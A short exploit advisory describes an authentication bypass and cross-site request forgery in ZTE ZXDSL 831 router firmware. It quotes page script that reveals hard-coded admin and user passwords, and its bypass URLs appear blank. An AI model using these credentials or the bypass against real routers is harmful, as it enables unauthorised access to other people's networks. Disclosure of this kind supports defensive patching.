# Exploit Title: ZTE ZXDSL 831IIV7.5.0a_Z29_OV Multiple vulnerabilities # Date: 28 / 10 / 2011 . # Authors: Mehdi Boukazoula ; Ibrahim Debeche . # Software Link with patch : # Version: v 831IIV7.5.0a_Z29_OV # Tested on: v 831IIV7.5.0a_Z29_OV, May Affect all ZTE routers !! # Description : 1 - Authentication bypass + Cross Site Request forgery To bypass authentication go to URL : To get request forgery; The attacker can request from his browser without cookie or any authentication, or send link to the Administrator : USER ACCOUNT : ADMIN ACCOUNT : 2 - Script revealing sensitive information on source of page "accessaccount.cgi": function frmLoad() { with ( document.forms.adminaccount ) { sysUserName.value = 'admin'; sysPassword.value = '43210'; syscfmPwd.value = '43210'; usrUserName.value = 'user'; usrPassword.value = '111111'; usrcfmPwd.value = '111111'; } }